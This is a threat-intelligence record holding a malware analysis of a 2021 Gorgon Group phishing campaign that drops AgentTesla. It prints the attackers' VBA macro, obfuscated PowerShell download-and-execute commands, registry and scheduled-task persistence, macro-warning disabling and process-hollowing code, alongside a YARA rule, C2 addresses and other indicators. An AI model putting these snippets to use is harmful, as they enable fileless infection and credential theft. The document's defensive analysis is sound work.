{ "id": "27bad4ff-7444-4977-a1bb-c8ba071907d5", "created_at": "2026-04-06T00:14:52.3312Z", "updated_at": "2026-04-10T13:11:39.144035Z", "deleted_at": null, "sha1_hash": "9e26b1f609bf14e037b4913faf1a26abd52850d1", "title": "2021 Gorgon Group APT Operation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7763780, "plain_text": "2021 Gorgon Group APT Operation\r\nPublished: 2022-01-12 · Archived: 2026-04-05 13:24:53 UTC\r\nThis article unveils the last 2021 Gorgon Group campaign, including the technical details regarding the infection\r\nchain and the various multi-stage payloads, its C\u0026C architecture, a tracking of the infected computer across the\r\nstudy, and finally, a way to automate the tracking of the campaign and the payload extraction.\r\nAll of the IOCs are available here.\r\nSummary\r\nTL;DR\r\nStage 0 : Downloader Macro\r\nStage 1 : JS / Powershell Downloader\r\nStage 2 : Injector wrapper\r\nStage 3 : The Alosh/3losh Injector case\r\nStage 4 : AgentTesla Final Payload\r\nAutomation\r\nIOCs\r\nBlogspots URL (stage 1)\r\nUsrFiles URL (stage 2)\r\nC\u0026C Lists\r\nYARA Rules\r\nTL;DR\r\nThis late 2021 campaign leverage an in-memory-infection chain to drop the AgentTesla malware on the infected\r\ncomputer, initiated by some phishing emails.\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 1 of 19\n\nThe infection chain uses a modular architecture, based on legit online services (“blogspot.com” pages and\r\n“usrfiles.com”) that respectively serves some JS/PowerShell command and a process hollowing tool.\r\nA final AgentTesla v3 payload is then injected in the memory of a legitilimate process on the infected computer.\r\nAt least half of the infected computer are Indonesian or related to the Indonesian industry. Through a\r\nmisconfiguration on the C\u0026C servers, we can observe the evolution of the “botnet” and track the infected\r\ncomputers.\r\nA lot of them are in critical company, related to various areas:\r\nThe whole infection chain can be summarized by this diagram:\r\nEach steps of the infection chain will be described in the following chapters.\r\nStage 0 : Downloader Macro\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 2 of 19\n\nFrom the batch of analyzed phishing e-mails from this campaign, it seems that the most of them are leveraging the\r\nauto_open() VBA function to execute some arbitrary code when they are opened with the macro enabled.\r\nThe VBA script in the malicious macro is not sophisticated nor obfuscated. Its goal is to load a remote JavaScript\r\nsnippet through the “Mshta.exe” legitimate binary.\r\nHere is an example of such a VBA macro that can be found in this campaign:\r\nEnum myenum\r\n myname1 = 1\r\n myname2 = 2\r\n myname3 = 3\r\n myname4 = 4\r\nEnd Enum\r\n \r\nPublic Function getEnumName(eValue As myenum)\r\nSelect Case eValue\r\n Case 1\r\n getEnumName = \"mshta\"\r\n Case 2\r\n getEnumName = \"http://www.bitly.com/doaksodksueasdweu\"\r\n End Select\r\nEnd Function\r\nPublic Function calc()\r\n Set calc = GetObject(StrReverse(\"000045355444-E94A-EC11-972C-02690731:wen\"))\r\nEnd Function\r\nSub auto_open()\r\n Dim Total As New clean\r\n Dim NamakTotal, lora As String\r\n NamakTotal = Total.getEnumName(1)\r\n lora = Total.getEnumName(2)\r\n koko = lora\r\n Total. calc. ShellExecute NamakTotal, koko\r\nEnd Sub\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 3 of 19\n\nThe reduced “bitly.com” link points to a blogspot page made by the attacker, which looks empty at first glance:\r\nStage 1 : JS / Powershell Downloader\r\nBy taking a deeper look at the JavaScript embedded in the blogspot page, we can spot the fact that this page\r\ncontains a script that is supposed to be ran remotely by the mshta instance from the previous stage.\r\nDepending on the analyzed page, or even on the timing when this operation was monitored, the scripts embedded\r\nin the various webpages may change.\r\nThis allows the operator to update the victims without the need to re-infect them or the re-compile its payloads.\r\nA total of 97 malicious active blogpost pages were identified and dumped. These pages do not always share the\r\nsame scripts. This repository contains a copy of the dumps made during the monitoring of this campaign.\r\nFor instance, some scripts were very small and straight forward in order to load the next stage without doing much\r\nmore.\r\nSome other were adding an intermediary persistence mechanism. For instance, this variant is adding an entry in\r\nthe “Run” registry key to make this stage 1 payload survive a reboot:\r\npink = \"pOwersHelL.exe -w h i'E'x(iwr('\u003curl\u003e') -useB);i'E'x(iwr(\u003curl\u003e') -useB);i'E'x(iwr('\u003curl\u003e') -useB);\"\r\nConst tpok = \u0026H80000001\r\nlopaskkk = \".\"\r\nSet kasodkmwm = GetObject(\"winmgmts:\\\\\" \u0026 lopaskkk \u0026 \"\\root\\default:StdRegProv\")\r\npoloaosd = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nakosdwdjdw = \"care\"\r\nkasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink\r\nIn the same fashion, this other one is setting up a scheduled tasked:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 4 of 19\n\nfunction MainAccess1()\r\nMegacall \"schtas\", \"k\" , \"s /crea\",\"te /sc MINUTE /mo 80 /tn \"\"\"\"Bluefibonashi\"\"\"\" /\" , \"F /tr \"\"\"\"\\\"\"\"\"M\" , \"s\r\nEnd function\r\nSome others versions of these scripts were spotted cleaning the stage 0 parents process and disabling the macro\r\nwarning messages:\r\nMicrosoftWINdows.Run \"taskkill /f /im winword.exe\", 0\r\nMicrosoftWINdows.Run \"taskkill /f /im Excel.exe\", 0\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nThis shows that the payloads are not homogeneous, even if they share the same objective: loading the next stage\r\nfrom another remote website.\r\nAs for the previous snippets, the part where the next stage is loaded is an obfuscated PowerShell command:\r\nakosdwdjdw = \"takeCare\"\r\nSubQueryPath akosdwdjdw,\"pOweRshell.exe -w h I`E`X([System.IO.Strea\"+\"mReader]::new( [System.Net.WebRequest]\"+\":\r\nThis command gave us the next stage payload location : the “usrfiles.com” platform.\r\nA list of the monitored “usrfiles.com” links can be found in the last part of this document.\r\nA total of 101 malicious “usrfiles.com” pages were monitored for this analysis.\r\nAt this point of the infection, everything is fileless as the payloads are never written down to the infected\r\ncomputer disk, making it harder for monitoring tools to detect the infection.\r\nStage 2 : Injector wrapper\r\nDepending on the monitored blogpost / usrfiles endpoint, several payloads can be found.\r\nThey usually share the same goal: loading the next stage in memory using PowerShell.\r\nSome lightweight PowerShell obfuscation methods are used.\r\nFor instance, in this first variant, the strings are built character by character and the injector compiled binary + the\r\nfinal payload are respectively stored as a PowerShell byte array and a compressed ZIP byte array:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 5 of 19\n\n[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202, [...])\r\n[...]\r\nByte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,9,152,92,69,181,56,126, [...])\r\n[...]\r\n$nan = \"R\"+\"e\"+\"g\"+\"A\"+\"s\"+\"m\"+\".\"+\"e\"+\"x\"+\"e\"\r\n[...]\r\n[Object[]] $Params=@($MyPt.Replace(\"F\"+\"r\"+\"a\"+\"m\"+\"e\"+\"w\"+\"or\"+\"k\"+\"6\"+\"4\",\"F\"+\"r\"+\"a\"+\"mew\"+\"o\"+\"r\"+\"k\") ,$Byt\r\nSome versions are embedding the final payload as a non-compressed byte-array.\r\nAnother variant is compiling the target DLL (final stage) at runtime:\r\n$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)\r\n$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters\r\n$v1 = \"Sys@@@\".Replace(\"@@@\",\"tem.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add($v1)\r\n$CompilerParametres.ReferencedAssemblies.Add(\"System.!@!$^^%^%**\u0026*\u0026*$$%$%$\".Replace(\"!@!$^^%^%**\u0026*\u0026*$$%$%$\",\"Man\r\n$CompilerParametres.ReferencedAssemblies.Add(\"System.Windows.Forms.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add(\"mscorlib.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add(\"Microsoft.VisualBasic.dll\")\r\n$CompilerParametres.IncludeDebugInformation = $false\r\n$CompilerParametres.GenerateExecutable = $false\r\n$CompilerParametres.GenerateInMemory = $true\r\n$CompilerParametres.CompilerOptions += \"/platform:X86 /unsafe /target:library\"\r\nFinally, some variants are adding a quick persistence mechanism using the “Startup” folder while doing some\r\nantivirus detection:\r\nMove-Item -Path \"C:\\Users\\Public\\Micropoft.vbs\" -Destination \"C:\\Users\\$env:UserName\\AppData\\Roaming\\Microsoft\\\r\n[...]\r\nif([System.IO.File]::Exists(\"C:\\Program Files\\ESET\\ESET Security\\ecmds.exe\")){\r\n [...]\r\n}\r\nelseif([System.IO.File]::Exists(\"C:\\Program Files\\Common Files\\McAfee\\Platform\\McUICnt.exe\")){\r\n [...]\r\n}\r\nelseif([System.IO.File]::Exists(\"C:\\Program Files\\Avast Software\\Avast\\AvastUI.exe\")){\r\n [...]\r\n}\r\nThese injectors are signed by the “Alosh/3losh RAT” author.\r\nStage 3 : The Alosh/3losh Injector case\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 6 of 19\n\nThe next stage of the infection chain seems to leverage the same compiled injector file every time, even if the\r\ninjected content (the final payload) is not always the same.\r\nA dozen of infection chain were related to the injector with the following hash:\r\n404afe734de0bd19d2a25f85f28c860d\r\nI’ve made a YARA rule to detect more of those injectors in the wild:\r\nrule Alosh_Process_Hollowing_Mana_Campaign {\r\n meta:\r\n author = \"HomardBoy\"\r\n description = \"Alosh RAT process hollowing program linked to the 2021 Gorgon Group APT\"\r\n strings:\r\n $str1 = \"alosh\" ascii\r\n $str2 = \"projFUD\" ascii\r\n $str3 = \"ZwUnmapViewOfSec\" ascii\r\n $str4 = \"ResumeThread\" ascii\r\n $str5 = \"WriteProcessMem\" ascii\r\n $str6 = \"VirtualAll\" ascii\r\n $str7 = \"CreateProc\" ascii\r\n condition:\r\n (uint16(0) == 0x5a4d and all of ($str*))\r\n}\r\nThis injector is not that new, and was already linked to previous Gorgon Group campaigns [5].\r\nThis tool is heavily advertised on social medias, along with some other packers/exploits. The YouTube channel\r\nnamed “3loshrat” shows a demonstration of how to use the injector, and its configurations options:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 7 of 19\n\nThe attentive reader will notice the presence of the “jsc.exe” available target in this screenshot, which is the same\r\nas the hardcoded injection target in the downloader wrapper from the stage 2.\r\nThe injector is advertised on many social media by the “3loshRAT” account:\r\nhttps://www[.]instagram.com/3losh.rat\r\nhttps://website[.]informer.cosh-rat.com\r\nhttps://twitter[.]com/ali_fares11\r\nhttps://www[.]youtube.com/c/3loshrat/videos\r\nThose social media accounts are advertising various “Alosh/3losh RAT” products, while the YouTube channel\r\nprovide some demonstration of the actual tools.\r\n\"crypter . powershell . vb . c# for sale all programs\"\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 8 of 19\n\nA GitHub account with the same name and the same profile picture can also be found:\r\nRegarding the actual injector itself:\r\nThe original name of this compiled DLL is straight forward: “runpe.dll”.\r\nThis binary, which is written in .Net, is linked to the Alosh/3losh RAT product through its file descriptions:\r\n[assembly: AssemblyCopyright(\"Copyright © 2022\")]\r\n[assembly: AssemblyTitle(\"3lostrat\")]\r\n[...]\r\n[assembly: AssemblyDescription(\"3lostrat\")]\r\n[assembly: AssemblyProduct(\"3lostrat\")]\r\n[assembly: AssemblyCompany(\"3lostrat\")]\r\nThe author of this piece of code saw far ahead for the copyright date of this sample, which indicate the fact that\r\nthis injector is still in its early life.\r\nThe goal of the binary is to inject an arbitrary binary, using a process hollowing technique (given by the second\r\nargument to the injector) in the process space named after the first given argument.\r\nAlmost all the stage 2 wrapper scripts were using the hardcoded target process name\r\n“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe” to inject the next stage in it.\r\nThis simple injector can be summarized to the following code:\r\n[...]\r\nalosh_rat.CreateProcessA(arg2_path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 134217732U, IntPtr.Zero, null\r\n[...]\r\nalosh_rat.ZwUnmapViewOfSection(alosh_rat.ZwUnmapViewOfSection, processInformation.ProcessHandle, num11\r\n[...]\r\nalosh_rat.WriteProcessMemory(processInformation.ProcessHandle, num9 + num7, arg1_buffer, array2.Length, ref num5\r\n[...]\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 9 of 19\n\nlosh_rat.ResumeThread(alosh_rat.ResumeThread, processInformation.ThreadHandle)]\r\n[...]\r\nThis code, which follows the standard Process Hollowing technique, seems inspired from this repository:\r\n“https://github.com/NYAN-x-CAT/CSharp-RunPE/blob/master/RunPE/RunPE.cs” as it share a lot of similarities\r\nwith the Alosh / 3losh version (minor the execution flow scrambling using some basic opaque predicates).\r\nThe injected payload (which is the final one of the infection stage) is a customized AgentTesla v3 malware.\r\nStage 3 : AgentTesla Final Payload\r\nThe final payload is a customized version of the AgentTesla malware. It will periodically make some screenshots\r\nof the infected computer screen, act as a keylogger when receiving a special order and steal the victim’s browser\r\ncookies and passwords.\r\nThe technical detailed analysis of this AgentTesla version is available here.\r\nC2 Infrastructure\r\nThe login page of the command and controls servers is a really unique one:\r\nThis login page is almost the same as the legacy AgentTelsa one, with a custom background and some reference to\r\nthe “Mana” string.\r\nThis “Mana” strings, the logo and the custom background allows linking this panel to the Gorgon Group APT [4],\r\nas they seem to keep this login page along campaigns [1].\r\nUnit 42’s researchers linked this characteristic panel to the “Aggah” threat actor, which is associated to the Gorgon\r\nGroup APT.\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 10 of 19\n\nThe late 2019/early 2021 campaigns were leveraging the same panel, but with the label “version 3”, and was\r\nattributed to the GorgonGroup/Hagga APT by various researcher [2] [3].\r\nEach server hold a list of 30 panels on average. They all share the same URL format between servers. The root\r\ndirectory is identified with a single letter: ‘/j’ or ‘/k’, for instance. Then a unique identifier is used to separate each\r\npanels: ‘/j/p1a’, ‘/j/p2b’, ‘/j/p3c’, …\r\nAlmost of the monitored servers were misconfigured, resulting in an open-directory at the web server’s root\r\ndirectory.\r\nThe “/files” directory is interesting, as it contains the stolen data from the victims.\r\nWith this access, it is possible to monitor the evolution of the number of victims in time:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 11 of 19\n\nAs seen in the introduction, we can spot a lot of infected computers in some critical area.\r\nThis one seems related to the tracking of credit card delivery:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 12 of 19\n\nThis one is an infected computer inside what seems to be a datacenter:\r\nHere is a medical tracking system:\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 13 of 19\n\nAnd here is another instance with a customs service platform related to the Indonesian government:\r\nMany more other sensitive companies were infected, in a lot of different area, along with some personal computer\r\nof citizens all around the world.\r\nSomething odd is the fact that one of the hosted panel stores a lot of infected computers from major Indonesian\r\ncompanies. From my observations, an average of 54% of the infected computer are Indonesians or related to\r\nIndonesians companies.\r\nAutomation\r\nIn order to build some hunting rules for the newer AgentTesla payload used in this campaign, a static\r\nconfiguration extractor was built in Python. It allows extracting the campaign ID of the compiled final payload,\r\nand its gate URL.\r\nThis script is available at https://github.com/GuillaumeOrlando/Daily-Malware-Analysis/tree/main/2021_11_12.\r\nIt allows tracking new panels with ease, or to map new samples with existing panels endpoints:\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_1.dmp\r\ncampaign id : http://103.125.190.248/j/p14o/mawa/4d380a5d91252d890dc4.php\r\npanel : af2926ce207b2bc813c89d939aaa2b01138ddda63b46416647288d31a75bd226\r\nMD5 agentTesla : 57ef73ca8f0afbc260638c1dd668e4e4\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_2.dmp\r\ncampaign id : http://103.125.190.248/j/p19t/mawa/48608c2b91739edc3959.php\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 14 of 19\n\npanel : d322164f81cf3f5c5c576a12e60be6fb27e4cc2e72085f500be81fda18272486\r\nMD5 agentTesla : c004124914c09d28a9bd99806e58605a\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_3.dmp\r\ncampaign id : http://103.125.190.248/j/p15p/mawa/e483d6564638acbf4559.php\r\npanel : 520585c44a0f6fbdbaaf7c43b8291f9421b2d1006eedfcbfbf17e7e60ff87abc\r\nMD5 agentTesla : b354a9e859952e1fcb1f2e27650ec5c9\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_4.dmp\r\ncampaign id : http://103.125.190.248/j/p17r/mawa/e6a2101b1d3a47e18c7f.php\r\npanel : b7e3573f18d53fb1647bf056583e3e284c2acb1b7f0a2f29592db8c80076d83e\r\nMD5 agentTesla : 4425f4efa71c8709a2666d4478f382ce\r\nIn order to gain access to those payloads, 3 additional scripts were created to automate the tracking of the\r\nmovement of the actor.\r\nThe first one is used to extract the stage 1 payload (JavaScript payload) for a set of given blogspot URL:\r\npython3 blog_payload_extract.py\r\n[*] Processing https://thethingsidontknowwhattyodo.blogspot.com/p/reza.html\r\n[-] Site is inactive\r\n[*] Processing https://madarbloghogya.blogspot.com/p/rezaback.html\r\n[+] Saved under ./Export/2022-01-03/https:__madarbloghogya_blogspot_com_p_rezaback_html\r\n[...]\r\n[*] Processing http://gagamutakakachota.blogspot.com/p/14.html\r\n[+] Saved under ./Export/2022-01-03/gagamutakakachota_blogspot_com_p_14_html\r\n[*] Processing http://bukbukbukak.blogspot.com/p/10.html\r\n[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html\r\n[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html\r\n[...]\r\nPayloads:\r\n['https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_dd2f1039bd3c48049b0fe8a43876696d.txt', 'h\r\n[...]\r\nPayload extract: ./Payloads/f0526bc7f32b879f170786e21061b425.dmp\r\nPayload extract: ./Payloads/c721fa5ee7d7eb8336baeaab72390b3f.dmp\r\n[...]\r\nPayload extract: ./Payloads/7fb91a9310a590dc4fc91f0183c3c5a9.dmp\r\nPayload extract: ./Payloads/8f6578c81e677eb963c7c8164c414ee3.dmp\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 15 of 19\n\nThese blogspot URL can be retrieved with the help of this small VirusTotal graph that I made):\r\nWith those extracted stage 1 and the “usrfiles” extracted URL, we can now obtain the “3losh Injector” binary and\r\nthe injected content with the help of another script that will simply download the stage 2 and 3 payloads.\r\nPayload extract: ./Payloads/loader_0/b1a471709f6fb58395e9c81a44f94bd7.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f1219abec862435b9069d453769c291d.txt\r\nPayload extract: ./Payloads/loader_0/f0b34ba48bf68057e6c5e68837141aab.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f2976cf0e0ad4d6d8330a9c3e0c8093c.txt\r\nPayload extract: ./Payloads/loader_0/b85fb5255a15d091277b8518d02500ce.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f33d5ba08a264a2fa73caaaf1c1aa89b.txt\r\nPayload extract: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt\r\nPayload extract: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp\r\nhttp://gdeb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_dd2f1039bd3c48049b0fe8a43876696d.txt\r\nPayload extract: ./Payloads/loader_0/f0526bc7f32b879f170786e21061b425.dmp\r\n[...]\r\nFinally, the last script will parse the extracted payloads to retrieve the last AgentTesla payload, ready to be\r\nanalyzed:\r\nProcessing: ./Payloads/loader_0/d6578c9f4802043a011ff44b79753636.dmp\r\n Alosh RAT type 1 (powershell Byte array version)\r\n new written to ./Payloads/loader_1/new_d6578c9f4802043a011ff44b79753636.dmp (MD5: 57ef73ca8f0afbc260638c1dd668\r\n H1 written to ./Payloads/loader_1/H1_d6578c9f4802043a011ff44b79753636.dmp (MD5: 404afe734de0bd19d2a25f85f28c86\r\n[...]\r\nProcessing: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp\r\n Alosh RAT type 1 (powershell Byte array version)\r\n new written to ./Payloads/loader_1/new_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: c004124914c09d28a9bd99806e58\r\n H1 written to ./Payloads/loader_1/H1_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: 404afe734de0bd19d2a25f85f28c86\r\n Unknown payload, skiping ...\r\nProcessing: ./Payloads/loader_0/c86a89bfbb6695378fb207de8578d206.dmp\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 16 of 19\n\nAlosh RAT type 2 (C# version)\r\n 0_array written to ./Payloads/loader_1/0_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: 7a8213b118b2c50cb31a\r\n 1_array written to ./Payloads/loader_1/1_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: e9c6b40bc5e5c33b2f4c\r\nProcessing: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp\r\n Alosh RAT type 2 (C# version)\r\n 0_array written to ./Payloads/loader_1/0_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: 7a8213b118b2c50cb31a\r\n 1_array written to ./Payloads/loader_1/1_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: eff0328870ecb6461aad\r\nIOCs\r\nThe full list of the IOCs observed during this analysis can be downloaded here\r\nHere is a small snippet of those:\r\nblogspot URLs (10):\r\nhttp[:]//iknowyoudidntlikeme.blogspot[.]com/p/black2.html\r\nhttp[:]//ajsubkuchtekhojaegameinkarkrahoga.blogspot[.]com/p/greenscreen2.html\r\nhttp[:]//startthepartyup.blogspot[.]com/p/backbone17.html\r\nhttp[:]//backbones2.blogspot[.]com/p/tradeback.html\r\nhttp[:]//fckusecurityresearchermotherfkrs.blogspot[.]com/p/7_17.html\r\nhttp[:]//0v2x.blogspot[.]com/p/10.html\r\nhttp[:]//sukmaduck.blogspot[.]com/p/12.html\r\nhttp[:]//bukbukbukak.blogspot[.]com/p/9.html\r\nhttp[:]//migimigichuchuchacha[.]blogspot.com/p/12.html\r\nhttp[:]//kumakahchachi.blogspot[.]com/p/11.html\r\n[...]\r\nUsrfiles URLs (10):\r\nhttp[:]//35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles[.]com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_01fd732ece0a4f29b9209b8f8132f293.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_05220f8387b44631845060f312ebff49.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_15c2594b40a245a9936b81883534b8d8.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_15c5b6f599b54c13932d6eeee22215c6.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_2be62edde647456296641827b5f458c2.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_35334aee6a4a4ea6a5fdfe8c8bc6c846.txt\r\nhttp[:]//92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com/ugd/92c492_42de07455185488a82fe24b590416b4a.txt\r\n[...]\r\nAgentTesla Hash (10):\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 17 of 19\n\n45b8ec3b9809beaf5c877d12924fa6f2983e37d3b3a4e5ad31c2e469ec5dd6f7\r\nf2dbd1f8aee814c623e74b862d1f7be363a93ef6c33ef579cfe7b9b38f274f11\r\n60a1a9a1e00a7e497cc935e4554ead3eda6ae88914e031c760f92db77c2c8ed0\r\n107c8bfec5d8a4e23c429692da4204025bb77fe71ff6b56a6804f5f19dc820c1\r\naaac6d698326e6fbbcd64057fbf591ef97bf143494ede008d41ab75e5a37db5a\r\n10314b0e419df11447489f46ed23232b128c91e12119a5cb1dfb8a395d6ae402\r\n7d5757013dd5f4888b13a1eaf6b615da51b6cb9dc7568c7661857ab2a4cfc1a9\r\nba9fe1f154b98085f694fc4eee4fe19b0337d304b1cb47633b566beced96df93\r\n36966f3ff9a3540873407980a43f50afb6b826c3e3046e18992dfe7afb6191ff\r\n0f8d952d31e5bbbea50ef45c50f9ad0c1047fe51eb5e4340025602a7f5fc5962\r\n[...]\r\nInfection vector Hash (pptx, xls, docx) (10)\r\n0289ee3c551ba84d34ab1760d042ab420733d96dbfedfae9718f8eb138c3259b\r\nde2cb3d281de8e1c4cd29bac18a633749da5d32013e67104579f3a9ee2bea239\r\n3f978ea5bfab5842d6d9c96ea4ab7b034818accfa9fe90f646e1fde7b23b087e\r\n3f978ea5bfab5842d6d9c96ea4ab7b034818accfa9fe90f646e1fde7b23b087e\r\n818f304883e566aa5cce96bda31d28239ade1164518f38377d6f4d80d449bae6\r\na4e0bf4310658fe98bebd2e94fee706fe52079b3f02d52700a40317d3225b09d\r\nbd630c3f79afd61a57b259f8f69593ead8f7e7bd3a6835bd9d3c4032f30dfb01\r\ncac79774c96452f034a2e3d65334f9123413932b5627d2b639ffa7b4efbf81a7\r\n07ddd3412909da33d751bcf1e3ec22b82464f1dc8b11af6bc7206b5bfe19e477\r\nc4723910526b6c8994e505eee03ffc51b4337a9c870b278041f8cdaee47e97bf\r\n[...]\r\nC2 Server list \u0026 Gates (10):\r\nhttp[:]//103.125.190.248/j/p1a/login[.]php\r\nhttp[:]//103.125.190.248/j/p1a/mawa/d68fbb027e9c4963e967[.]php (gate)\r\nhttp[:]//103.125.190.248/j/p1a/mawa/67a10f84d937d92cc069[.]php (gate)\r\nhttp[:]//103.125.190.248/j/p1a/mawa/3a3a0c4b972bfe8a04fe[.]php (gate)\r\nhttp[:]//180.214.239.67/k/login[.]php\r\nhttp[:]//180.214.239.67/k/p12l/inc/f938393de7cee3[.]php (gate)\r\nhttp[:]//103.141.138.110/k/6f/login[.]php\r\nhttp[:]//103.141.138.110/k/6f/mawa/6c82a18db78ef078a4d8[.]php (gate)\r\nhttp[:]//161.129.64.49/webpanel-divine/login[.]php\r\nhttp[:]//161.129.64.49/webpanel-divine/mawa/7dd66d9f8e1cf61ae198[.]php (gate)\r\n[...]\r\nReferences\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 18 of 19\n\n[1] https://www.riskiq.com/blog/external-threat-management/mana-tools-malware-c2-panel/\r\n[2] https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/\r\n[3] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Aggah\r\n[4] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Gorgon%20Group\r\n[5] https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html\r\nSource: https://guillaumeorlando.github.io/GorgonInfectionchain\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 19 of 19\n\n https://guillaumeorlando.github.io/GorgonInfectionchain \nThis one is an infected computer inside what seems to be a datacenter:\nHere is a medical tracking system: \n Page 13 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://guillaumeorlando.github.io/GorgonInfectionchain" ], "report_names": [ "GorgonInfectionchain" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b0d34dd6-ee90-483b-bb6c-441332274160", "created_at": "2022-10-25T16:07:23.296754Z", "updated_at": "2026-04-10T02:00:04.526403Z", "deleted_at": null, "main_name": "Aggah", "aliases": [ "Operation Red Deer", "Operation Roma225" ], "source_name": "ETDA:Aggah", 